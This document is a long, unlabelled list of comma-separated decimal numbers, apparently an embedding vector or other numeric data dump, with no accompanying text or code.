-0.0038183731958270073, 0.025029826909303665, -0.012600631453096867, -0.0022968684788793325, -0.0006531171384267509, -0.00820560660213232, 0.028832614421844482, 0.007079575676470995, -0.03481733053922653, -0.027741650119423866, -0.001803986611776054, 0.025793500244617462, -0.016816427931189537, -0.003869025269523263, 0.010465459898114204, 0.008735503070056438, 0.03659404441714287, 0.024671366438269615, 0.01876457780599594, 0.030141770839691162, -0.01383186224848032, 0.018826918676495552, 0.009203058667480946, -0.01054338552057743, -0.006000300869345665, 0.019138621166348457, -0.05941076949238777, 0.00603147130459547, -0.004850892815738916, 0.011307060718536377, 0.009592688642442226, -0.01628653146326542, -0.006222390104085207, -0.021273793652653694, -0.014782559126615524, -0.02474929206073284, 0.030889861285686493, 0.02468695305287838, -0.036936916410923004, -0.027258509770035744, 0.031902898102998734, 0.023097261786460876, -0.027289679273962975, -0.00832249503582716, -0.001967631047591567, 0.007601679768413305, 0.019575007259845734, -0.01213307585567236, 0.012553876265883446, -0.01634887233376503, -0.0017007346032187343, -0.015296870842576027, 0.009779711253941059, 0.03126390650868416, 0.04401259496808052, -0.05208572745323181, 0.012117491103708744, 0.01736190915107727, 0.012499327771365643, -0.012600631453096867, -0.002193616470322013, 0.05355073884129524, 0.04055268317461014, -0.009881014935672283, 0.00140169367659837, -0.005501574371010065, -0.0279286727309227, -0.006806834600865841, 0.01021609641611576, 0.02167900837957859, -0.018328191712498665, -0.01313052885234356, -0.006148360203951597, 0.03381987661123276, 0.018234681338071823, 0.015803389251232147, 0.0023358315229415894, -0.0018692496232688427, 0.01299805473536253, -0.0078003909438848495, -0.02256736531853676, 0.03103012777864933, 0.011143416166305542, -0.012070734985172749, 0.032354868948459625, 0.016364457085728645, -0.024967486038804054, -0.0015117641305550933, -0.0017747642705217004, -0.01608392409980297, -0.0013062342768535018, 0.005630152300000191, 0.011533046141266823, 0.0015604678774252534, -0.03103012777864933, 0.027227338403463364, 0.004231381230056286, 0.013450024649500847, 0.01906069554388523, 0.008431592024862766, -0.013239624910056591, 0.01298246905207634, 0.013013639487326145, -0.014120188541710377, 0.00006459333962993696, -0.036469362676143646, 0.014205907471477985, -0.0008255284046754241, 0.00388266216032207, 0.01430721115320921, 0.032354868948459625, -0.002014386700466275, 0.004609322175383568, -0.0028852096293121576, -0.0038183731958270073, -0.006728908978402615, 0.02171017974615097, -0.02933134138584137, 0.014439685270190239, 0.01284999493509531, 0.0032008099369704723, -0.005743145011365414, -0.0017728161765262485, -0.009577103890478611, -0.017486590892076492, -0.02331545390188694, -0.028848199173808098, -0.03360168635845184, -0.06576953083276749, 0.014081225730478764, -0.014463063329458237, -0.006849694065749645, 0.006534093990921974, 0.002380638848990202, 0.010636896826326847, 0.008829014375805855, -0.029487192630767822, 0.018452873453497887, 0.003504721214994788, -0.014852692373096943, -0.010161548852920532, 0.026183130219578743, -0.014408514834940434, 0.004262551199644804, 0.014798144809901714, 0.02144523151218891, -0.016146264970302582, 0.013676010072231293, -0.027975428849458694, 0.026603931561112404, -0.013301965780556202, -0.0022462166380137205, 0.019964637234807014, -0.03397572785615921, 0.03219901770353317, 0.001565338228829205, 0.028146866708993912, 0.01778271049261093, -0.025528552010655403, -0.022380342707037926, 0.013052602298557758, 0.02403237298130989, -0.029939163476228714, 0.008751087822020054, -0.03936820849776268, 0.013800691813230515, -0.008119887672364712, -0.004040462430566549, 0.01733073964715004, 0.013878618367016315, 0.004445677623152733, 0.023424550890922546, -0.00533792981877923, 0.01605275273323059, -0.007496479898691177, 0.020385438576340675, -0.0028988467529416084, -0.02828713320195675, 0.004091114271432161, 0.041020236909389496, -0.034287434071302414, 0.0008907914161682129, 0.0006477597635239363, 0.02945602312684059, 0.03556542098522186, -0.024936314672231674, 0.006717219948768616, -0.04850113391876221, 0.0319184847176075, 0.005462611559778452, -0.010005696676671505, 0.0127876540645957, -0.005657426547259092, -0.03416275233030319, 0.007886109873652458, -0.008680954575538635, -0.017143717035651207, 0.04719197750091553, -0.005673011764883995, -0.03313412889838219, -0.015460515394806862, -0.002967031905427575, 0.0012614268343895674, -0.006495130714029074, -0.027679309248924255, -0.01034857053309679, -0.006292523350566626, -0.027819577604532242, -0.024858389049768448, -0.017517762258648872, -0.016208605840802193, -0.020136075094342232, 0.027258509770035744, -0.027461117133498192, 0.0057470411993563175, 0.02507658116519451, 0.0066782571375370026, 0.00045611054520122707, 0.03724862262606621, 0.006206804886460304, -0.00878225825726986, 0.0006784431170672178, -0.019434740766882896, -0.005006744526326656, -0.0006063616019673645, -0.033071789890527725, 0.015413760207593441, -0.015133226290345192, -0.048968687653541565, -0.04086438566446304, 0.009553725831210613, 0.002805335447192192, 0.011057697236537933, -0.012312306091189384, 0.025746745988726616, -0.0052093518897891045, -0.03983576223254204, -0.004001499153673649, 0.008657576516270638, -0.010177133604884148, 0.030001504346728325, -0.009257607161998749, -0.006136671174317598, -0.030562572181224823, 0.0525844544172287, 0.003044957760721445, 0.016426797956228256, -0.012156453914940357, -0.013870825059711933, -0.006912034936249256, -0.026183130219578743, -0.033102959394454956, 0.004722314886748791, -0.009522555395960808, -0.031185979023575783, 0.012382439337670803, 0.009421251714229584, -0.015398174524307251, 0.035097863525152206, 0.020026978105306625, -0.0046249073930084705, -0.011907090432941914, -0.0017611272633075714, -0.00764453923329711, -0.009904392994940281, 0.030095014721155167, 0.006269145291298628, -0.022769972681999207, -0.009670615196228027, 0.0333523228764534, 0.023003751412034035, -0.01161097176373005, -0.014509818516671658, 0.004924922250211239, -0.014665670692920685, 0.0005201559397391975, -0.024531099945306778, 0.051742855459451675, 0.009771918877959251, -0.026370152831077576, -0.016364457085728645, 0.008595236577093601, -0.018530799075961113, 0.009888807311654091, 0.019824370741844177, -0.010403119027614594, 0.016302116215229034, 0.013863032683730125, 0.01023168209940195, -0.010473252274096012, -0.03534722700715065, 0.014985167421400547, -0.020712727680802345, -0.00936670321971178, 0.010948601178824902, 0.0025131129659712315, 0.000026558758690953255, -0.045726969838142395, -0.014712425880134106, 0.012585046701133251, 0.02733643539249897, -0.025544138625264168, -0.010005696676671505, -0.02655717544257641, -0.03593946620821953, -0.001803986611776054, -0.0037462918553501368, 0.01709696091711521, 0.019169792532920837, 0.001941331080161035, 0.0012984417844563723, 0.020182829350233078, -0.0023650536313652992, 0.006008093245327473, 0.0014961789129301906, 0.035097863525152206, -0.015148811973631382, -0.00018190847185906023, -0.017486590892076492, 0.0019851643592119217, 0.008291324600577354, -0.031373001635074615, 0.003411209909245372, 0.0045664627104997635, 0.02593376860022545, -0.016956694424152374, -0.00840042158961296, 0.014276040717959404, 0.01590469293296337, -0.0025618167128413916, -0.03534722700715065, -0.059005554765462875, 0.021725764498114586, -0.013590292073786259, -0.0036761583760380745, 0.00373655091971159, -0.01219541672617197, -0.0005109022604301572, -0.0020981570705771446, 0.02308167703449726, -0.00995894055813551, -0.011494082398712635, 0.026401324197649956, -0.028552081435918808, -0.027648139744997025, -0.0021098461002111435, 0.0063977232202887535, 0.010068037547171116, -0.008244569413363934, 0.009935563430190086, 0.013590292073786259, 0.011431742459535599, -0.016177434474229813, -0.01345781795680523, -0.0299235787242651, -0.061592698097229004, -0.006740597542375326, 0.011026526801288128, -0.013676010072231293, 0.0036001806147396564, 0.026214301586151123, -0.01670733094215393, -0.01396433636546135, 0.0005401244852691889, 0.00982646644115448, 0.0026631206274032593, 0.012920128181576729, -0.03718627989292145, -0.008306910283863544, 0.010083622299134731, 0.009226436726748943, -0.05202338844537735, -0.011821371503174305, -0.03350817412137985, -0.0089770732447505, -0.015102055855095387, 0.01608392409980297, 0.01572546362876892, 0.01854638382792473, -0.01363704726099968, 0.02305050566792488, -0.018748991191387177, -0.03216784819960594, -0.012468157336115837, 0.012662972323596478, -0.016193019226193428, -0.008595236577093601, 0.0460386723279953, -0.01239023171365261, 0.008260154165327549, -0.019528251141309738, 0.010566763579845428, 0.0175956878811121, -0.008509517647325993, 0.021367305889725685, 0.01628653146326542, 0.00390798831358552, 0.0013120787916705012, -0.034349773079156876, 0.019528251141309738, -0.00025618166546337306, -0.020619215443730354, -0.024562271311879158, -0.02108677104115486, -0.014494232833385468, -0.02224007621407509, 0.02128937840461731, 0.007332835346460342, -0.00435606250539422, 0.02543504163622856, 0.026307811960577965, -0.0010919378837570548, 0.002481942530721426, -0.0037462918553501368, -0.006904242094606161, -0.013761729001998901, -0.005065189208835363, 0.03316529840230942, 0.006635397672653198, 0.01775153912603855, -0.015226737596094608, 0.0019393829861655831, 0.007141916546970606, 0.005474300589412451, 0.029939163476228714, -0.028832614421844482, 0.004936611279845238, -0.010683652944862843, -0.0108706746250391, 0.0006799042457714677, 0.012351268902420998, -0.0024215499870479107, 0.011922676116228104, -0.0008566987817175686, 0.010925223119556904, -0.005310656037181616, 0.005661322735249996, 0.005649633705615997, 0.008735503070056438, -0.01429162546992302, -0.008743295446038246, 0.02406354434788227, -0.024281736463308334, -0.036375850439071655, 0.012094113044440746, 0.04691144451498985, -0.012405816465616226, 0.006896449718624353, -0.006386034656316042, -0.009351118467748165, 0.026151960715651512, 0.016333285719156265, -0.014400722458958626, 0.03001708909869194, -0.03341466188430786, 0.00872771069407463, -0.01690993830561638, 0.032978277653455734, -0.0036001806147396564, -0.016489138826727867, -0.008836806751787663, -0.006635397672653198, -0.02269204705953598, -0.000664319028146565, -0.00884459912776947, -0.009803089313209057, 0.0007734153768979013, -0.010855089873075485, -0.041643645614385605, -0.01436955202370882, -0.013348720967769623, -0.008252361789345741, -0.0007982543320395052, 0.0070990570820868015, -0.0008985840249806643, 0.033726368099451065, 0.016037167981266975, -0.0017017086502164602, -0.015382589772343636, 0.015507271513342857, -0.011470705270767212, 0.024203810840845108, -0.009460214525461197, -0.011766823939979076, -0.01641121320426464, -0.019839955493807793, -0.00042615772690624, -0.011875919997692108, 0.0006083096959628165, -0.035721272230148315, 0.01080833375453949, -0.0024644092191010714, -0.021195868030190468, -0.007157501764595509, -0.0007422449998557568, 0.005263900384306908, -0.0032008099369704723, 0.0009667692356742918, -0.013075980357825756, -0.012904543429613113, 0.01100314874202013, 0.03681223466992378, 0.08989541977643967, 0.004983366932719946, 0.0072704944759607315, -0.030687253922224045, -0.0014630603836849332, -0.0054392339661717415, 0.003056646790355444, -0.012538290582597256, 0.007406864780932665, -0.0006857486441731453, 0.004246965982019901, -0.009881014935672283, 0.010395326651632786, 0.00524052232503891, 0.00010763526370283216, 0.008883561939001083, -0.0019491236889734864, 0.0006945153581909835, 0.01932564377784729, -0.011127830483019352, 0.004546981304883957, -0.0026611723005771637, -0.002818972570821643, -0.02340896613895893, 0.00945242214947939, -0.021195868030190468, -0.021694594994187355, -0.024967486038804054, -0.05538979172706604, -0.019871126860380173, -0.0021078980062156916, -0.004231381230056286, -0.019341230392456055, 0.011049904860556126, 0.0029865133110433817, 0.0008532895590178668, 0.019434740766882896, -0.006199012044817209, -0.0022053054999560118, -0.015491685830056667, 0.004745692480355501, -0.022910239174962044, -0.011361608281731606, 0.010699237696826458, 0.0025754538364708424, -0.011470705270767212, 0.02093091979622841, -0.0226608756929636, -0.010597934015095234, 0.028365058824419975, -0.006308108568191528, -0.018359361216425896, 0.005727559793740511, -0.012257757596671581, 0.007215946447104216, 0.014579951763153076, -0.0049950554966926575, -0.016551479697227478, -0.003643039846792817, 0.0033664025831967592, 0.00032485395786352456, -0.006113293580710888, -0.005610670894384384, -0.013200662098824978, 0.009444629773497581, -0.006908138748258352, -0.016598233953118324, 0.0029280688613653183, -0.027835162356495857, 0.015522856265306473, 0.018484042957425117, 0.004426195751875639, -0.01775153912603855, 0.013231832534074783, 0.0024897351395338774, 0.033071789890527725, -0.0006224337848834693, 0.026510419324040413, -0.02978331223130226, -0.02105560153722763, 0.017174886539578438, 0.045010048896074295, -0.002004645997658372, 0.01553064864128828, 0.00095118407625705, 0.033570513129234314, -0.011875919997692108, 0.00044490868458524346, -0.000563989335205406, 0.0014718270394951105, -0.014346173964440823, -0.019200962036848068, 0.018795747309923172, 0.01909186691045761, 0.008353665471076965, 0.025887012481689453, 0.008182228542864323, -0.007301664911210537, -0.005131426267325878, -0.0014815677423030138, 0.008174436166882515, -0.013278587721288204, 0.024499930441379547, 0.00328263221308589, -0.017050204798579216, 0.006312004756182432, 0.00964723713696003, 0.020712727680802345, -0.009374495595693588, -0.013068187981843948, -0.03394455835223198, -0.009351118467748165, 0.017845051363110542, -0.022582950070500374, -0.01404226291924715, 0.024796048179268837, 0.008688746951520443, -0.011696690693497658, -0.030718423426151276, -0.011704483069479465, -0.02527919039130211, -0.02742994762957096, 0.030687253922224045, -0.0012214898597449064, 0.013707180507481098, -0.0012799343094229698, 0.01641121320426464, -0.008462762460112572, 0.04008512571454048, 0.01765802875161171, 0.014642292633652687, -0.01496178936213255, 0.010901845060288906, -0.022972580045461655, 0.014346173964440823, -0.02727409452199936, 0.016598233953118324, 0.009156303480267525, -0.016364457085728645, 0.011416156776249409, -0.010371948592364788, 0.014821521937847137, 0.01128368265926838, -0.012553876265883446, 0.004695040639489889, 0.0009687173878774047, -0.013800691813230515, 0.008571858517825603, 0.0020611423533409834, 0.023549232631921768, 0.0058678267523646355, -0.058226294815540314, 0.007617264986038208, 0.020291926339268684, 0.00776532432064414, -0.010660274885594845, 0.028754688799381256, -0.023190774023532867, -0.009086170233786106, -0.006701634731143713, 0.011252512224018574, 0.0133253438398242, 0.022084224969148636, -0.013434439897537231, -0.0016461864579468966, 0.023985618725419044, 0.0023747943341732025, -0.009327740408480167, -0.020852994173765182, -0.022785557433962822, 0.00884459912776947, 0.01602158322930336, -0.0071107461117208, 0.007223738823086023, 0.010574555955827236, 0.008790051564574242, -0.023814180865883827, 0.026962390169501305, 0.027118243277072906, -0.035596590489149094, 0.0071497089229524136, 0.007286079693585634, 0.016832012683153152, 0.01417473703622818, 0.004940507467836142, -0.009140717796981335, -0.0030975579284131527, 0.006058745551854372, -0.038900651037693024, 0.021102357655763626, -0.006826316472142935, 0.04750367999076843, -0.016520308330655098, -0.000012023736417177133, -0.003869025269523263, -0.032978277653455734, 0.005965234246104956, -0.012678558006882668, -0.01028622966259718, -0.008228983730077744, -0.0020182831212878227, -0.009732955135405064, -0.013886410742998123, 0.0036547286435961723, -0.026245471090078354, -0.027087071910500526, 0.0016627457225695252, -0.0019189274171367288, -0.023549232631921768, 0.0017562569119036198, -0.006113293580710888, 0.030453475192189217, 0.011096660047769547, 0.010652482509613037, 0.00350666930899024, -0.00931994803249836, 0.0014650084776803851, -0.026401324197649956, -0.0047301072627305984, -0.016177434474229813, -0.020837407559156418, 0.01906069554388523, 0.0025832464452832937, -0.0026338982861489058, -0.014135773293673992, 0.018499629572033882, 0.03276008367538452, -0.02959628961980343, -0.012312306091189384, 0.024577856063842773, -0.009834259748458862, 0.015304663218557835, -0.0004570846213027835, 0.006413308437913656, 0.0025092167779803276, -0.023097261786460876, -0.006974375806748867, 0.006502923555672169, -0.021008845418691635, 0.010652482509613037, -0.004313203506171703, 0.01661382056772709, -0.005349618848413229, 0.0022462166380137205, 0.023751839995384216, -0.00007195977377705276, 0.017969733104109764, -0.010340778157114983, -0.016535894945263863, 0.02400120347738266, -0.042298223823308945, -0.0021507572382688522, 0.0072120497934520245, -0.0017991161439567804, 0.008618613705039024, 0.018032072111964226, -0.0029767726082354784, 0.005735352635383606, -0.017174886539578438, 0.0008562117582187057, 0.005782108288258314, -0.0027741650119423866, -0.008525102399289608, 0.03927469626069069, -0.01450202614068985, 0.026136375963687897, 0.001765023567713797, 0.002828713273629546, 0.02269204705953598, 0.0014650084776803851, 0.02962745912373066, 0.013348720967769623, -0.0005362281808629632, -0.02870793268084526, -0.010535593144595623, -0.010777163319289684, 0.006487338338047266, -0.0099745262414217, 0.0014338381588459015, -0.01115120854228735, 0.002026075730100274, 0.07113084197044373, 0.007391279563307762, -0.013777313753962517, 0.011891505680978298, -0.01003686711192131, -0.035534247756004333, -0.014065640047192574, -0.005782108288258314, 0.002442979719489813, -0.016146264970302582, -0.0066198124550282955, -0.0066704642958939075, -0.031139222905039787, 0.01906069554388523, 0.0022111497819423676, -0.012086320668458939, 0.006230182480067015, -0.025746745988726616, -0.00776532432064414, 0.013590292073786259, 0.038931820541620255, 0.010847297497093678, 0.013037017546594143, -0.002119586803019047, 0.01095639355480671, -0.019169792532920837, 0.0010052452562376857, -0.011517460457980633, 0.00014952047786209732, -0.014447477646172047, -0.020026978105306625, -0.008275739848613739, -0.020915335044264793, 0.008719917386770248, 0.0014348122058436275, 0.024110300466418266, 0.02459344081580639, -0.019372399896383286, 0.0260896198451519, 0.012234379537403584, -0.02040102332830429, -0.06121865287423134, -0.00793676171451807, -0.006043160334229469, 0.0020475052297115326, 0.010371948592364788, -0.005766523070633411, 0.009857636876404285, -0.021367305889725685, 0.014852692373096943, 0.006666568107903004, 0.029206659644842148, 0.008641991764307022, -0.002493631560355425, -0.029861237853765488, 0.024577856063842773, -0.0007437061285600066, -0.0011679157614707947, 0.007025027647614479, -0.03600180521607399, 0.011649934574961662, -0.01593586429953575, 0.015187774784862995, 0.01213307585567236, 0.008930318057537079, -0.014315003529191017, -0.0035358916502445936, -0.003870973363518715, -0.03450562804937363, -0.017611272633075714, -0.00793676171451807, -0.011665520258247852, 0.020588045939803123, 0.015522856265306473, 0.009561518207192421, 0.011899298056960106, 0.014096810482442379, 0.01337209902703762, -0.03927469626069069, -0.01088626030832529, 0.02239592745900154, -0.0023650536313652992, -0.000054487310990225524, 0.006105500739067793, -0.011275890283286572, -0.0008123784209601581, 0.025731161236763, 0.0022014090791344643, 0.008509517647325993, -0.028193620964884758, 0.014525403268635273, -0.0007422449998557568, -0.011065489612519741, -0.020821822807192802, 0.005774315446615219, 0.002244268311187625, -0.013543535955250263, -0.0099745262414217, 0.014821521937847137, 0.005832760129123926, -0.0065613677725195885, -0.009795296005904675, -0.00030123264878056943, -0.009608274325728416, 0.014517610892653465, -0.014463063329458237, 0.007601679768413305, 0.003044957760721445, 0.0012107749935239553, 0.0019121088553220034, 0.017283983528614044, 0.03057815693318844, 0.03385104984045029, 0.012530498206615448, 0.011275890283286572, 0.014190321788191795, 0.0012594787403941154, -0.008790051564574242, -0.011969431303441525, 0.025154508650302887, -0.012694142758846283, 0.0014611121732741594, 0.01745542138814926, 0.01496178936213255, 0.010099207982420921, 0.006179530639201403, -0.018748991191387177, 0.0500284843146801, 0.006623708643019199, 0.0044534699991345406, 0.008610821329057217, -0.0128655806183815, -0.022224491462111473, 0.004897648002952337, -0.006522404961287975, -0.017548931762576103, -0.0015010492643341422, -0.009000451304018497, 0.02439083345234394, 0.019372399896383286, 0.0015244270907714963, -0.03276008367538452, -0.03204316645860672, -0.007792598567903042, -0.020120488479733467, 0.00930436234921217, 0.00047242629807442427, -0.006549679208546877, -0.007387383375316858, 0.01709696091711521, 0.013021431863307953, -0.011166793294250965, 0.0015555975260213017, -0.00658864201977849, -0.004885959438979626, -0.002931965282186866, 0.012709728442132473, -0.01625536009669304, 0.00040131882997229695, 0.025918181985616684, -0.007067886646836996, -0.021959543228149414, -0.002742994576692581, -0.012405816465616226, -0.005930167622864246, -0.01430721115320921, 0.0030020985286682844, -0.00228128326125443, -0.020837407559156418, 0.011899298056960106, 0.001703656860627234, 0.013512365520000458, -0.002844298491254449, -0.020182829350233078, 0.0030215801671147346, -0.012320098467171192, 0.005743145011365414, 0.0023611574433743954, 0.010340778157114983, 0.008377043530344963, -0.014868278056383133, 0.02599610947072506, 0.016364457085728645, 0.008439384400844574, 0.015125433914363384, -0.003670313861221075, 0.005291174631565809, 0.008439384400844574, -0.03154443949460983, 0.009756333194673061, 0.017081376165151596, 0.01840611733496189, 0.009164095856249332, -0.0011494082864373922, -0.0016111197182908654, -0.008361457847058773, -0.0181099995970726, 0.0004921513027511537, -0.01932564377784729, 0.0045080180279910564, 0.017471006140112877, -0.0007174061029218137, 0.0008620562148280442, -0.014650085009634495, 0.017346324399113655, -0.0015195567393675447, -0.002894950332120061, 0.004706729669123888, 0.01706579141318798, 0.019839955493807793, 0.00019432792032603174, 0.0070990570820868015, 0.010621312074363232, 0.011486290022730827, 0.010473252274096012, 0.012234379537403584, 0.02962745912373066, 0.0006078226724639535, -0.02543504163622856, -0.011322645470499992, -0.004441780969500542, 0.011229134164750576, 0.0026124685537070036, -0.002189720282331109, -0.007944554090499878, -0.004543085116893053, 0.0007919228519313037, 0.012366853654384613, -0.012094113044440746, 0.002931965282186866, -0.0031521061901003122, -0.003896299283951521, -0.0015604678774252534, 0.012896750122308731, 0.002871572505682707, -0.015312456525862217, -0.018499629572033882, -0.023627158254384995, -0.02459344081580639, 0.00273520196788013, 0.01631770096719265, 0.00995894055813551, -0.014244870282709599, 0.008330287411808968, 0.014081225730478764, 0.018125584349036217, 0.02004256285727024, 0.0012059046421200037, -0.020775068551301956, 0.0026611723005771637, 0.007371798157691956, -0.007909487932920456, -0.0005649633822031319, 0.004266447853296995, 0.02569998987019062, 0.016535894945263863, -0.005069085396826267, -0.0042937216348946095, -0.0025150610599666834, 0.005965234246104956, -0.013473402708768845, 0.004819722380489111, 0.01807882823050022, -0.0016228086315095425, -0.021367305889725685, -0.003783306572586298, 0.003572906367480755, -0.011010942049324512, 0.018982769921422005, 0.02880144491791725, 0.008213398978114128, -0.006939309183508158, -0.0045080180279910564, 0.010356363840401173, -0.007352316752076149, -0.006015886086970568, 0.0005644763587042689, -0.011642142198979855, 0.007913383655250072, -0.0018361309776082635, -0.0007359135197475553, 0.035658929497003555, -0.0007899746997281909, 0.015803389251232147, -0.0023105053696781397, 0.004897648002952337, 0.004426195751875639, 0.012624009512364864, -0.021180283278226852, 0.0007217894308269024, -0.008758881129324436, 0.007017234805971384, -0.0011591489892452955, -0.0133253438398242, 0.01676967181265354, -0.004013188183307648, -0.021273793652653694, -0.005034018773585558, -0.01034857053309679, 0.0068341088481247425, -0.002179979346692562, -0.01870223693549633, 0.008579650893807411, 0.009912185370922089, -0.023689499124884605, 0.018499629572033882, -0.005384685471653938, -0.02507658116519451, -0.002195564564317465, 0.005898997187614441, 0.028988465666770935, -0.023066092282533646, 0.006908138748258352, -0.0008907914161682129, -0.02295699529349804, -0.010738200508058071, -0.004687247797846794, -0.008392628282308578, 0.00838483590632677, -0.011159000918269157, 0.0017825568793341517, 0.0006331486511044204, -0.01494620367884636, 0.0075860945507884026, 0.012538290582597256, 0.029315754771232605, -0.015031922608613968, -0.010340778157114983, -0.018172340467572212, 0.00840042158961296, 0.0001832478301366791, 0.006767871789634228, 0.009506970643997192, 0.00781597662717104, -0.01694110967218876, -0.013169491663575172, 0.0113304378464818, -0.003644987940788269, -0.05314552038908005, 0.006035367492586374, -0.0019471755949780345, -0.011307060718536377, -0.006300315726548433, 0.012016186490654945, -0.006502923555672169, 0.030172942206263542, -0.018094412982463837, 0.002817024476826191, -0.002220890484750271, 0.011548630893230438, 0.0030878172256052494, -0.00918747391551733, 0.014112396165728569, -0.011642142198979855, 0.008369251154363155, -0.019902296364307404, -0.014689047820866108, -0.001127978670410812, -0.0034774472005665302, 0.007504272274672985, -0.01337209902703762, -0.00048435869393870234, -0.007469205651432276, -0.004948299843817949, 0.003356661880388856, 0.00872771069407463, -0.007882213220000267, -0.012577254325151443, 0.02024517022073269, 0.005049603991210461, 0.017502175644040108, -0.010060244239866734, 0.00583665631711483, 0.01574884168803692, -0.013839654624462128, 0.01595924235880375, 0.009538140147924423, 0.012896750122308731, -0.009358910843729973, 0.014572159387171268, 0.01831260696053505, -0.005454819183796644, 0.010894052684307098, 0.015296870842576027, 0.01723722741007805, 0.0012536343419924378, 0.004110595677047968, 0.023783011361956596, -0.005626256112009287, -0.009881014935672283, -0.0037891510874032974, -0.019434740766882896, -0.009226436726748943, -0.023923277854919434, -0.022380342707037926, 0.011696690693497658, -0.002452720422297716, -0.030952202156186104, -0.004192417953163385, 0.001352015882730484, -0.011501875706017017, 0.0008688747184351087, -0.01214866153895855, -0.011774616315960884, -0.04395025596022606, -0.003518358338624239, -0.006845797877758741, 0.013886410742998123, -0.015429344959557056, 0.014572159387171268, 0.008579650893807411, 0.017704783007502556, -0.007309457287192345, 0.011509668081998825, -0.0199490524828434, -0.011205757036805153, 0.009966733865439892, 0.00814326573163271, 0.013488988392055035, 0.019372399896383286, -0.01828143559396267, 0.009265399537980556, 0.008166642859578133, 0.004640492610633373, 0.0065107159316539764, -0.005618463736027479, -0.005131426267325878, 0.0004149558662902564, 0.0012322046095505357, 0.005150907672941685, 0.0014581900322809815, 0.003596284193918109, -0.005875619128346443, -0.02063480019569397, 0.013722766190767288, -0.004449573811143637, -0.0005070059560239315, 0.03285359591245651, 0.0017435939516872168, -0.01906069554388523, 0.005992508493363857, 0.005485989153385162, -0.009335532784461975, 0.0004205568111501634, 0.015686500817537308, -0.01154083851724863, -0.043046314269304276, -0.01821909472346306, -0.004153455141931772, 0.016598233953118324, 0.017829464748501778, 0.04002278670668602, 0.007683502044528723, -0.000016346193660865538, -0.021694594994187355, -0.0053184484131634235, -0.019793199375271797, -0.006366552785038948, -0.004340477287769318, 0.05118178576231003, 0.007449724245816469, -0.011946053244173527, 0.007652331609278917, 0.01733073964715004, 0.01134602352976799, 0.000027137115466757677, 0.006288627162575722, -0.0391811840236187, 0.02376742474734783, -0.0020884163677692413, 0.008556272834539413, -0.015078677795827389, -0.001414356636814773, 0.0078081837855279446, -0.008790051564574242, 0.003641091752797365, -0.004539188463240862, -0.000876180303748697, -0.022380342707037926, -0.0008737451280467212, 0.011057697236537933, 0.011353815905749798, 0.022442683577537537, -0.0000932676630327478, 0.0002324386005057022, 0.0027118243742734194, -0.021601082757115364, 0.00041812160634435713, 0.007083471864461899, 0.0024001202546060085, -0.002033868106082082, 0.019372399896383286, -0.024016788229346275, -0.008626407012343407, -0.012935713864862919, 0.016395626589655876, -0.012616217136383057, 0.0018098310101777315, -0.013660425320267677, 0.018717821687459946, 0.005244418978691101, -0.016722915694117546, -0.005505471024662256, 0.028661176562309265, -0.004169040359556675, -0.010356363840401173, 0.0012624009978026152, 0.007021131459623575, -0.017471006140112877, -0.013598084449768066, -0.012631801888346672, -0.006421101279556751, 0.018032072111964226, -0.00608991552144289, -0.015429344959557056, -0.026868879795074463, 0.007461413275450468, 0.011096660047769547, -0.009725162759423256, -0.012031772173941135, -0.035035524517297745, -0.004613218363374472, 0.008345873095095158, 0.01873340643942356, 0.004511914681643248, 0.006460064090788364, -0.01219541672617197, 0.014899448491632938, -0.006148360203951597, -0.014626707881689072, 0.010683652944862843, -0.02108677104115486, -0.007395176216959953, -0.004052151460200548, -0.004846996162086725, 0.0008722839993424714, 0.03201199322938919, 0.010730408132076263, -0.014930618926882744, 0.013707180507481098, -0.008509517647325993, 0.006004197057336569, -0.021694594994187355, -0.023486891761422157, -0.013792899437248707, 0.014377344399690628, -0.01502413023263216, -0.012701936066150665, -0.004375543911010027, -0.011603179387748241, -0.015896901488304138, -0.019528251141309738, -0.012499327771365643, -0.021990712732076645, 0.0051119448617100716, 0.006545782554894686, -0.015974827110767365, -0.02510775253176689, 0.043638553470373154, -0.010855089873075485, -0.014315003529191017, 0.028520910069346428, 0.003567062085494399, 0.006822419818490744, -0.013512365520000458, 0.008345873095095158, -0.010457667522132397, -0.014276040717959404, -0.014782559126615524, 0.007687398232519627, 0.014431892894208431, -0.004819722380489111, 0.023518063127994537, 0.01870223693549633, -0.019154207780957222, 0.002404016675427556, -0.036282338201999664, -0.024312907829880714, 0.005458715371787548, -0.0061834268271923065, 0.006436686497181654, 0.02135171927511692, -0.030656082555651665, -0.005657426547259092, -0.017954146489501, -0.03687457740306854, 0.009351118467748165, -0.004546981304883957, 0.01417473703622818, -0.021928371861577034, 0.0004320021835155785, 0.012514913454651833, 0.018982769921422005, 0.0036138175055384636, -0.0041378699243068695, -0.013379891403019428, -0.012070734985172749, -0.030172942206263542, 0.013075980357825756, 0.006097708363085985, 0.0031111950520426035, -0.02426615171134472, -0.00014562418800778687, -0.012514913454651833, -0.010317400097846985, 0.005676907952874899, -0.00001247272393811727, -0.0255753081291914, -0.023860936984419823, 0.007102953735738993, 0.0080575468018651, -0.016426797956228256, 0.027570214122533798, 0.020385438576340675, -0.00008084820728981867, 0.0029105355497449636, -0.00618732301518321, 0.010052451863884926, 0.010590141639113426, 0.008228983730077744, -0.012413609772920609, 0.0054898858070373535, 0.0391811840236187, -0.011143416166305542, 0.013239624910056591, 0.003533943323418498, 0.005287277977913618, -0.012811032123863697, 0.025715574622154236, 0.016598233953118324, 0.011439534835517406, -0.002871572505682707, -0.003296269103884697, 0.009156303480267525, -0.006775664631277323, -0.00930436234921217, -0.03070283867418766, -0.02099326066672802, 0.005147011484950781, 0.01500854454934597, 0.02629222720861435, -0.009834259748458862, 0.01034857053309679, -0.0037774620577692986, -0.008314702659845352, -0.0032806838862597942, -0.01697227917611599, -0.0025851945392787457, 0.0035105657298117876, -0.007336731534451246, 0.0036118694115430117, 0.003945002797991037, 0.01180578675121069, -0.043669722974300385, 0.01369938813149929, 0.004472951404750347, -0.003479395294561982, -0.013465610332787037, 0.0011747342068701982, -0.003672261955216527, -0.009662821888923645, 0.012281135655939579, -0.018858088180422783, 0.001553649315610528, -0.0007178931264206767, 0.008579650893807411, 0.0069977534003555775, 0.0057041822001338005, 0.00886018481105566, -0.0007904617232270539, 0.0014708529924973845, -0.014579951763153076, -0.00008322251960635185, -0.01807882823050022, 0.0021819276735186577, -0.009093962609767914, 0.0038047363050282, 0.02239592745900154, -0.036251168698072433, -0.01965293288230896, -0.02632339857518673, 0.00040667623397894204, -0.004204106982797384, 0.013481195084750652, -0.0062535605393350124, -0.013068187981843948, -0.030780764296650887, 0.00137734180316329, 0.0023085572756826878, -0.025855841115117073, -0.007928969338536263, 0.005552226677536964, -0.012904543429613113, 